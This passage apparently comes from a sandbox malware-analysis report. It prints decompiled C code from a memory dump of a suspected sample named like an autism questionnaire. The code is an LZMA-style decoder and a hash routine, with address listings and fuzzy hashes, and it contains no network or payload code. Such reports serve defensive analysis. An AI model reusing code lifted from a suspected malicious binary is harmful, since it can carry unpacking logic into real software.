                                                                                              				_v64 =  *((intOrPtr*)(_v8 + 0x30));
                                                                                              				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
                                                                                              				_v72 =  *((intOrPtr*)(_v8 + 0xc));
                                                                                              				_t616 =  *((intOrPtr*)(_v8 + 0x28));
                                                                                              				_v128 =  *((intOrPtr*)(_v8 + 0x20));
                                                                                              				_v124 =  *((intOrPtr*)(_v8 + 0x24));
                                                                                              				_v120 = _v12;
                                                                                              				_v136 =  *((intOrPtr*)(_v8 + 0x14));
                                                                                              				_v132 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                              				 *_a4 = 0;
                                                                                              				if(_v56 == 0xffffffff) {
                                                                                              					return 0;
                                                                                              				}
                                                                                              				__eflags = _v72;
                                                                                              				if(_v72 == 0) {
                                                                                              					_v68 =  &_v76;
                                                                                              					_v72 = 1;
                                                                                              					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
                                                                                              				}
                                                                                              				__eflags = _v56 - 0xfffffffe;
                                                                                              				if(_v56 != 0xfffffffe) {
                                                                                              					L12:
                                                                                              					_v108 = _v16 + _v24;
                                                                                              					while(1) {
                                                                                              						__eflags = _v56;
                                                                                              						if(_v56 == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						__eflags = _v24 - _a8;
                                                                                              						if(_v24 < _a8) {
                                                                                              							_t458 = _t616 - _t617;
                                                                                              							__eflags = _t458 - _v72;
                                                                                              							if(_t458 >= _v72) {
                                                                                              								_t458 = _t458 + _v72;
                                                                                              								__eflags = _t458;
                                                                                              							}
                                                                                              							_t460 =  *((intOrPtr*)(_v68 + _t458));
                                                                                              							 *((char*)(_v68 + _t616)) = _t460;
                                                                                              							 *_v108 = _t460;
                                                                                              							_v24 = _v24 + 1;
                                                                                              							_v108 = _v108 + 1;
                                                                                              							_t616 = _t616 + 1;
                                                                                              							__eflags = _t616 - _v72;
                                                                                              							if(_t616 == _v72) {
                                                                                              								_t616 = 0;
                                                                                              								__eflags = 0;
                                                                                              							}
                                                                                              							_t116 =  &_v56;
                                                                                              							 *_t116 = _v56 - 1;
                                                                                              							__eflags =  *_t116;
                                                                                              							continue;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = _t616;
                                                                                              					if(_t616 != 0) {
                                                                                              						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
                                                                                              					} else {
                                                                                              						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
                                                                                              					}
                                                                                              					__eflags = 0;
                                                                                              					_v116 = 0;
                                                                                              					_v112 = 0;
                                                                                              					while(1) {
                                                                                              						L24:
                                                                                              						_v108 = _v16 + _v24;
                                                                                              						__eflags = _v24 - _a8;
                                                                                              						if(_v24 >= _a8) {
                                                                                              							break;
                                                                                              						} else {
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						while(1) {
                                                                                              							L25:
                                                                                              							_v88 = _v24 + _v60 & _v32;
                                                                                              							__eflags = _v116;
                                                                                              							if(_v116 != 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__eflags = _v112;
                                                                                              							if(_v112 == 0) {
                                                                                              								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
                                                                                              								__eflags = _t370;
                                                                                              								if(_t370 != 0) {
                                                                                              									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
                                                                                              									__eflags = _t375 != 1;
                                                                                              									if(_t375 != 1) {
                                                                                              										_v52 = _v48;
                                                                                              										_v48 = _v44;
                                                                                              										_v44 = _t617;
                                                                                              										__eflags = _t474 - 7;
                                                                                              										if(__eflags >= 0) {
                                                                                              											_t377 = 0xa;
                                                                                              										} else {
                                                                                              											_t377 = 7;
                                                                                              										}
                                                                                              										_t474 = _t377;
                                                                                              										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
                                                                                              										_t503 =  &_v136;
                                                                                              										__eflags = _v56 - 4;
                                                                                              										if(_v56 >= 4) {
                                                                                              											_t381 = 3;
                                                                                              										} else {
                                                                                              											_t381 = _v56;
                                                                                              										}
                                                                                              										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
                                                                                              										__eflags = _v100 - 4;
                                                                                              										if(_v100 < 4) {
                                                                                              											_t618 = _v100;
                                                                                              										} else {
                                                                                              											_v104 = (_v100 >> 1) - 1;
                                                                                              											_t524 = _v104;
                                                                                              											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
                                                                                              											__eflags = _v100 - 0xe;
                                                                                              											if(_v100 >= 0xe) {
                                                                                              												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
                                                                                              												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
                                                                                              											} else {
                                                                                              												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
                                                                                              											}
                                                                                              										}
                                                                                              										_t617 = _t618 + 1;
                                                                                              										__eflags = _t617;
                                                                                              										if(_t617 != 0) {
                                                                                              											L82:
                                                                                              											_v56 = _v56 + 2;
                                                                                              											__eflags = _t617 - _v64;
                                                                                              											if(_t617 <= _v64) {
                                                                                              												__eflags = _v72 - _v64 - _v56;
                                                                                              												if(_v72 - _v64 <= _v56) {
                                                                                              													_v64 = _v72;
                                                                                              												} else {
                                                                                              													_v64 = _v64 + _v56;
                                                                                              												}
                                                                                              												while(1) {
                                                                                              													_t389 = _t616 - _t617;
                                                                                              													__eflags = _t389 - _v72;
                                                                                              													if(_t389 >= _v72) {
                                                                                              														_t389 = _t389 + _v72;
                                                                                              														__eflags = _t389;
                                                                                              													}
                                                                                              													_v25 =  *((intOrPtr*)(_v68 + _t389));
                                                                                              													 *((char*)(_v68 + _t616)) = _v25;
                                                                                              													_t616 = _t616 + 1;
                                                                                              													__eflags = _t616 - _v72;
                                                                                              													if(_t616 == _v72) {
                                                                                              														_t616 = 0;
                                                                                              														__eflags = 0;
                                                                                              													}
                                                                                              													_v56 = _v56 - 1;
                                                                                              													 *_v108 = _v25;
                                                                                              													_v24 = _v24 + 1;
                                                                                              													_v108 = _v108 + 1;
                                                                                              													__eflags = _v56;
                                                                                              													if(_v56 == 0) {
                                                                                              														break;
                                                                                              													}
                                                                                              													__eflags = _v24 - _a8;
                                                                                              													if(_v24 < _a8) {
                                                                                              														continue;
                                                                                              													}
                                                                                              													break;
                                                                                              												}
                                                                                              												L93:
                                                                                              												__eflags = _v24 - _a8;
                                                                                              												if(_v24 < _a8) {
                                                                                              													continue;
                                                                                              												}
                                                                                              												goto L94;
                                                                                              											}
                                                                                              											return 1;
                                                                                              										} else {
                                                                                              											_v56 = 0xffffffff;
                                                                                              											goto L94;
                                                                                              										}
                                                                                              									}
                                                                                              									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
                                                                                              									__eflags = _t411;
                                                                                              									if(_t411 != 0) {
                                                                                              										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
                                                                                              										if(__eflags != 0) {
                                                                                              											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
                                                                                              											if(__eflags != 0) {
                                                                                              												_t422 = _v52;
                                                                                              												_v52 = _v48;
                                                                                              											} else {
                                                                                              												_t422 = _v48;
                                                                                              											}
                                                                                              											_v48 = _v44;
                                                                                              										} else {
                                                                                              											_t422 = _v44;
                                                                                              										}
                                                                                              										_v44 = _t617;
                                                                                              										_t617 = _t422;
                                                                                              										L65:
                                                                                              										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
                                                                                              										__eflags = _t474 - 7;
                                                                                              										if(_t474 >= 7) {
                                                                                              											_t426 = 0xb;
                                                                                              										} else {
                                                                                              											_t426 = 8;
                                                                                              										}
                                                                                              										_t474 = _t426;
                                                                                              										goto L82;
                                                                                              									}
                                                                                              									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
                                                                                              									if(__eflags != 0) {
                                                                                              										goto L65;
                                                                                              									}
                                                                                              									__eflags = _v64;
                                                                                              									if(_v64 != 0) {
                                                                                              										__eflags = _t474 - 7;
                                                                                              										if(_t474 >= 7) {
                                                                                              											_t508 = 0xb;
                                                                                              										} else {
                                                                                              											_t508 = 9;
                                                                                              										}
                                                                                              										_t474 = _t508;
                                                                                              										_t435 = _t616 - _t617;
                                                                                              										__eflags = _t435 - _v72;
                                                                                              										if(_t435 >= _v72) {
                                                                                              											_t435 = _t435 + _v72;
                                                                                              											__eflags = _t435;
                                                                                              										}
                                                                                              										_v25 =  *((intOrPtr*)(_v68 + _t435));
                                                                                              										 *((char*)(_v68 + _t616)) = _v25;
                                                                                              										_t616 = _t616 + 1;
                                                                                              										__eflags = _t616 - _v72;
                                                                                              										if(_t616 == _v72) {
                                                                                              											_t616 = 0;
                                                                                              											__eflags = 0;
                                                                                              										}
                                                                                              										 *_v108 = _v25;
                                                                                              										_v24 = _v24 + 1;
                                                                                              										__eflags = _v64 - _v72;
                                                                                              										if(_v64 < _v72) {
                                                                                              											_v64 = _v64 + 1;
                                                                                              										}
                                                                                              										goto L24;
                                                                                              									}
                                                                                              									return 1;
                                                                                              								}
                                                                                              								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
                                                                                              								__eflags = _t474 - 7;
                                                                                              								if(__eflags < 0) {
                                                                                              									_v25 = E00425444(_t448,  &_v136, __eflags);
                                                                                              								} else {
                                                                                              									_v96 = _t616 - _t617;
                                                                                              									__eflags = _v96 - _v72;
                                                                                              									if(__eflags >= 0) {
                                                                                              										_t161 =  &_v96;
                                                                                              										 *_t161 = _v96 + _v72;
                                                                                              										__eflags =  *_t161;
                                                                                              									}
                                                                                              									_v89 =  *((intOrPtr*)(_v68 + _v96));
                                                                                              									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
                                                                                              								}
                                                                                              								 *_v108 = _v25;
                                                                                              								_v24 = _v24 + 1;
                                                                                              								_v108 = _v108 + 1;
                                                                                              								__eflags = _v64 - _v72;
                                                                                              								if(_v64 < _v72) {
                                                                                              									_t180 =  &_v64;
                                                                                              									 *_t180 = _v64 + 1;
                                                                                              									__eflags =  *_t180;
                                                                                              								}
                                                                                              								 *((char*)(_v68 + _t616)) = _v25;
                                                                                              								_t616 = _t616 + 1;
                                                                                              								__eflags = _t616 - _v72;
                                                                                              								if(_t616 == _v72) {
                                                                                              									_t616 = 0;
                                                                                              									__eflags = 0;
                                                                                              								}
                                                                                              								__eflags = _t474 - 4;
                                                                                              								if(_t474 >= 4) {
                                                                                              									__eflags = _t474 - 0xa;
                                                                                              									if(_t474 >= 0xa) {
                                                                                              										_t474 = _t474 - 6;
                                                                                              									} else {
                                                                                              										_t474 = _t474 - 3;
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t474 = 0;
                                                                                              								}
                                                                                              								goto L93;
                                                                                              							}
                                                                                              							return 1;
                                                                                              						}
                                                                                              						return _v116;
                                                                                              					}
                                                                                              					L94:
                                                                                              					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
                                                                                              					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
                                                                                              					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
                                                                                              					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
                                                                                              					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
                                                                                              					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
                                                                                              					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
                                                                                              					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
                                                                                              					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
                                                                                              					 *(_v8 + 0x44) = _t474;
                                                                                              					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
                                                                                              					 *((char*)(_v8 + 0x4c)) = _v76;
                                                                                              					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
                                                                                              					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
                                                                                              					 *_a4 = _v24;
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
                                                                                              				_v84 = 0;
                                                                                              				_v108 = _v20;
                                                                                              				__eflags = _v84 - _v80;
                                                                                              				if(_v84 >= _v80) {
                                                                                              					L7:
                                                                                              					_v52 = 1;
                                                                                              					_v48 = 1;
                                                                                              					_v44 = 1;
                                                                                              					_t617 = 1;
                                                                                              					_v60 = 0;
                                                                                              					_v64 = 0;
                                                                                              					_t474 = 0;
                                                                                              					_t616 = 0;
                                                                                              					 *((char*)(_v68 + _v72 - 1)) = 0;
                                                                                              					E00425294( &_v136);
                                                                                              					__eflags = _v116;
                                                                                              					if(_v116 != 0) {
                                                                                              						return _v116;
                                                                                              					}
                                                                                              					__eflags = _v112;
                                                                                              					if(_v112 == 0) {
                                                                                              						__eflags = 0;
                                                                                              						_v56 = 0;
                                                                                              						goto L12;
                                                                                              					} else {
                                                                                              						return 1;
                                                                                              					}
                                                                                              				} else {
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				do {
                                                                                              					L6:
                                                                                              					 *_v108 = 0x400;
                                                                                              					_v84 = _v84 + 1;
                                                                                              					_v108 = _v108 + 2;
                                                                                              					__eflags = _v84 - _v80;
                                                                                              				} while (_v84 < _v80);
                                                                                              				goto L7;
                                                                                              			}
                                                                                              0x00425785
                                                                                              0x0042578e
                                                                                              0x004257c3
                                                                                              0x004257c3
                                                                                              0x004257c7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004257cc
                                                                                              0x004257cf
                                                                                              0x00425795
                                                                                              0x00425797
                                                                                              0x0042579a
                                                                                              0x0042579c
                                                                                              0x0042579c
                                                                                              0x0042579c
                                                                                              0x004257a9
                                                                                              0x004257aa
                                                                                              0x004257b0
                                                                                              0x004257b2
                                                                                              0x004257b5
                                                                                              0x004257b8
                                                                                              0x004257b9
                                                                                              0x004257bc
                                                                                              0x004257be
                                                                                              0x004257be
                                                                                              0x004257be
                                                                                              0x004257c0
                                                                                              0x004257c0
                                                                                              0x004257c0
                                                                                              0x00000000
                                                                                              0x004257c0
                                                                                              0x00000000
                                                                                              0x004257cf
                                                                                              0x004257d1
                                                                                              0x004257d3
                                                                                              0x004257eb
                                                                                              0x004257d5
                                                                                              0x004257df
                                                                                              0x004257df
                                                                                              0x004257f0
                                                                                              0x004257f2
                                                                                              0x004257f5
                                                                                              0x004257f8
                                                                                              0x004257f8
                                                                                              0x00425801
                                                                                              0x00425807
                                                                                              0x0042580a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425810
                                                                                              0x00425810
                                                                                              0x00425819
                                                                                              0x0042581c
                                                                                              0x00425820
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0042582a
                                                                                              0x0042582e
                                                                                              0x00425851
                                                                                              0x00425856
                                                                                              0x00425858
                                                                                              0x00425931
                                                                                              0x00425936
                                                                                              0x00425937
                                                                                              0x00425a77
                                                                                              0x00425a7d
                                                                                              0x00425a80
                                                                                              0x00425a83
                                                                                              0x00425a86
                                                                                              0x00425a8f
                                                                                              0x00425a88
                                                                                              0x00425a88
                                                                                              0x00425a88
                                                                                              0x00425a94
                                                                                              0x00425aac
                                                                                              0x00425aaf
                                                                                              0x00425ab5
                                                                                              0x00425ab9
                                                                                              0x00425ac0
                                                                                              0x00425abb
                                                                                              0x00425abb
                                                                                              0x00425abb
                                                                                              0x00425adc
                                                                                              0x00425adf
                                                                                              0x00425ae3
                                                                                              0x00425b5c
                                                                                              0x00425ae5
                                                                                              0x00425aeb
                                                                                              0x00425aee
                                                                                              0x00425afa
                                                                                              0x00425afc
                                                                                              0x00425b00
                                                                                              0x00425b36
                                                                                              0x00425b58
                                                                                              0x00425b02
                                                                                              0x00425b26
                                                                                              0x00425b26
                                                                                              0x00425b00
                                                                                              0x00425b5f
                                                                                              0x00425b5f
                                                                                              0x00425b60
                                                                                              0x00425b6b
                                                                                              0x00425b6b
                                                                                              0x00425b6f
                                                                                              0x00425b72
                                                                                              0x00425b84
                                                                                              0x00425b87
                                                                                              0x00425b94
                                                                                              0x00425b89
                                                                                              0x00425b8c
                                                                                              0x00425b8c
                                                                                              0x00425b97
                                                                                              0x00425b99
                                                                                              0x00425b9b
                                                                                              0x00425b9e
                                                                                              0x00425ba0
                                                                                              0x00425ba0
                                                                                              0x00425ba0
                                                                                              0x00425ba9
                                                                                              0x00425bb2
                                                                                              0x00425bb5
                                                                                              0x00425bb6
                                                                                              0x00425bb9
                                                                                              0x00425bbb
                                                                                              0x00425bbb
                                                                                              0x00425bbb
                                                                                              0x00425bbd
                                                                                              0x00425bc6
                                                                                              0x00425bc8
                                                                                              0x00425bcb
                                                                                              0x00425bce
                                                                                              0x00425bd2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425bd7
                                                                                              0x00425bda
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425bda
                                                                                              0x00425bdc
                                                                                              0x00425bdf
                                                                                              0x00425be2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425be2
                                                                                              0x00000000
                                                                                              0x00425b62
                                                                                              0x00425b62
                                                                                              0x00000000
                                                                                              0x00425b62
                                                                                              0x00425b60
                                                                                              0x0042594f
                                                                                              0x00425954
                                                                                              0x00425956
                                                                                              0x00425a06
                                                                                              0x00425a08
                                                                                              0x00425a26
                                                                                              0x00425a28
                                                                                              0x00425a2f
                                                                                              0x00425a35
                                                                                              0x00425a2a
                                                                                              0x00425a2a
                                                                                              0x00425a2a
                                                                                              0x00425a3b
                                                                                              0x00425a0a
                                                                                              0x00425a0a
                                                                                              0x00425a0a
                                                                                              0x00425a3e
                                                                                              0x00425a41
                                                                                              0x00425a43
                                                                                              0x00425a59
                                                                                              0x00425a5c
                                                                                              0x00425a5f
                                                                                              0x00425a68
                                                                                              0x00425a61
                                                                                              0x00425a61
                                                                                              0x00425a61
                                                                                              0x00425a6d
                                                                                              0x00000000
                                                                                              0x00425a6d
                                                                                              0x0042597d
                                                                                              0x0042597f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425985
                                                                                              0x00425989
                                                                                              0x00425995
                                                                                              0x00425998
                                                                                              0x004259a1
                                                                                              0x0042599a
                                                                                              0x0042599a
                                                                                              0x0042599a
                                                                                              0x004259a6
                                                                                              0x004259aa
                                                                                              0x004259ac
                                                                                              0x004259af
                                                                                              0x004259b1
                                                                                              0x004259b1
                                                                                              0x004259b1
                                                                                              0x004259ba
                                                                                              0x004259c3
                                                                                              0x004259c6
                                                                                              0x004259c7
                                                                                              0x004259ca
                                                                                              0x004259cc
                                                                                              0x004259cc
                                                                                              0x004259cc
                                                                                              0x004259d4
                                                                                              0x004259d6
                                                                                              0x004259dc
                                                                                              0x004259df
                                                                                              0x004259e5
                                                                                              0x004259e5
                                                                                              0x00000000
                                                                                              0x004259df
                                                                                              0x00000000
                                                                                              0x0042598b
                                                                                              0x00425888
                                                                                              0x0042588d
                                                                                              0x00425890
                                                                                              0x004258d1
                                                                                              0x00425892
                                                                                              0x00425896
                                                                                              0x0042589c
                                                                                              0x0042589f
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258a4
                                                                                              0x004258b0
                                                                                              0x004258c1
                                                                                              0x004258c1
                                                                                              0x004258da
                                                                                              0x004258dc
                                                                                              0x004258df
                                                                                              0x004258e5
                                                                                              0x004258e8
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258ea
                                                                                              0x004258f3
                                                                                              0x004258f6
                                                                                              0x004258f7
                                                                                              0x004258fa
                                                                                              0x004258fc
                                                                                              0x004258fc
                                                                                              0x004258fc
                                                                                              0x004258fe
                                                                                              0x00425901
                                                                                              0x0042590a
                                                                                              0x0042590d
                                                                                              0x00425917
                                                                                              0x0042590f
                                                                                              0x0042590f
                                                                                              0x0042590f
                                                                                              0x00425903
                                                                                              0x00425903
                                                                                              0x00425903
                                                                                              0x00000000
                                                                                              0x00425901

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                              • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                              • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
                                                                                              				signed int* _v8;
                                                                                              				signed int* _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				char _v28;
                                                                                              				unsigned int* _t96;
                                                                                              				unsigned int* _t106;
                                                                                              				signed int* _t108;
                                                                                              				signed int _t109;
                                                                                              
                                                                                              				_t109 = __edx;
                                                                                              				_v16 = __ecx;
                                                                                              				_v12 = __eax;
                                                                                              				_t106 =  &_v24;
                                                                                              				_t108 =  &_v28;
                                                                                              				_t96 =  &_v20;
                                                                                              				 *_t96 = __edx + 0xdeadbeef + _v16;
                                                                                              				 *_t106 =  *_t96;
                                                                                              				 *_t108 =  *_t96;
                                                                                              				_v8 = _v12;
                                                                                              				if((_v8 & 0x00000003) != 0) {
                                                                                              					if(__edx <= 0xc) {
                                                                                              						L20:
                                                                                              						if(_t109 > 0xc) {
                                                                                              							L23:
                                                                                              							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
                                                                                              							L24:
                                                                                              							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
                                                                                              							L25:
                                                                                              							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
                                                                                              							L26:
                                                                                              							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
                                                                                              							L27:
                                                                                              							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
                                                                                              							L28:
                                                                                              							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
                                                                                              							L29:
                                                                                              							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
                                                                                              							L30:
                                                                                              							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
                                                                                              							L31:
                                                                                              							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
                                                                                              							L32:
                                                                                              							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
                                                                                              							L33:
                                                                                              							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
                                                                                              							L34:
                                                                                              							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
                                                                                              							L35:
                                                                                              							 *_t108 =  *_t108 ^  *_t106;
                                                                                              							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
                                                                                              							 *_t96 =  *_t96 ^  *_t108;
                                                                                              							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
                                                                                              							 *_t106 =  *_t106 ^  *_t96;
                                                                                              							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
                                                                                              							 *_t108 =  *_t108 ^  *_t106;
                                                                                              							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
                                                                                              							 *_t96 =  *_t96 ^  *_t108;
                                                                                              							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                              							 *_t106 =  *_t106 ^  *_t96;
                                                                                              							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
                                                                                              							 *_t108 =  *_t108 ^  *_t106;
                                                                                              							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
                                                                                              							return  *_t108;
                                                                                              						}
                                                                                              						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
                                                                                              							case 0:
                                                                                              								return  *_t108;
                                                                                              							case 1:
                                                                                              								goto L34;
                                                                                              							case 2:
                                                                                              								goto L33;
                                                                                              							case 3:
                                                                                              								goto L32;
                                                                                              							case 4:
                                                                                              								goto L31;
                                                                                              							case 5:
                                                                                              								goto L30;
                                                                                              							case 6:
                                                                                              								goto L29;
                                                                                              							case 7:
                                                                                              								goto L28;
                                                                                              							case 8:
                                                                                              								goto L27;
                                                                                              							case 9:
                                                                                              								goto L26;
                                                                                              							case 0xa:
                                                                                              								goto L25;
                                                                                              							case 0xb:
                                                                                              								goto L24;
                                                                                              							case 0xc:
                                                                                              								goto L23;
                                                                                              						}
                                                                                              					} else {
                                                                                              						goto L19;
                                                                                              					}
                                                                                              					do {
                                                                                              						L19:
                                                                                              						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
                                                                                              						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
                                                                                              						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
                                                                                              						 *_t96 =  *_t96 -  *_t108;
                                                                                              						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                              						 *_t108 =  *_t108 +  *_t106;
                                                                                              						 *_t106 =  *_t106 -  *_t96;
                                                                                              						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                                                              						 *_t96 =  *_t96 +  *_t108;
                                                                                              						 *_t108 =  *_t108 -  *_t106;
                                                                                              						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                                                              						 *_t106 =  *_t106 +  *_t96;
                                                                                              						 *_t96 =  *_t96 -  *_t108;
                                                                                              						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                                                              						 *_t108 =  *_t108 +  *_t106;
                                                                                              						 *_t106 =  *_t106 -  *_t96;
                                                                                              						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                                                              						 *_t96 =  *_t96 +  *_t108;
                                                                                              						 *_t108 =  *_t108 -  *_t106;
                                                                                              						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                                                              						 *_t106 =  *_t106 +  *_t96;
                                                                                              						_t109 = _t109 - 0xc;
                                                                                              						_v8 =  &(_v8[3]);
                                                                                              					} while (_t109 > 0xc);
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				if(__edx <= 0xc) {
                                                                                              					L3:
                                                                                              					if(_t109 > 0xc) {
                                                                                              						goto L35;
                                                                                              					}
                                                                                              					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
                                                                                              						case 0:
                                                                                              							return  *_t108;
                                                                                              						case 1:
                                                                                              							_v8 =  *_v8;
                                                                                              							__edx =  *_v8 & 0x000000ff;
                                                                                              							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
                                                                                              							goto L35;
                                                                                              						case 2:
                                                                                              							_v8 =  *_v8;
                                                                                              							__edx =  *_v8 & 0x0000ffff;
                                                                                              							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
                                                                                              							goto L35;
                                                                                              						case 3:
                                                                                              							_v8 =  *_v8;
                                                                                              							__edx =  *_v8 & 0x00ffffff;
                                                                                              							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
                                                                                              							goto L35;
                                                                                              						case 4:
                                                                                              							_v8 =  *_v8;
                                                                                              							 *__eax =  *__eax +  *_v8;
                                                                                              							goto L35;
                                                                                              						case 5:
                                                                                              							__edx = _v8;
                                                                                              							 *__eax =  *__eax +  *__edx;
                                                                                              							__edx =  *(__edx + 4);
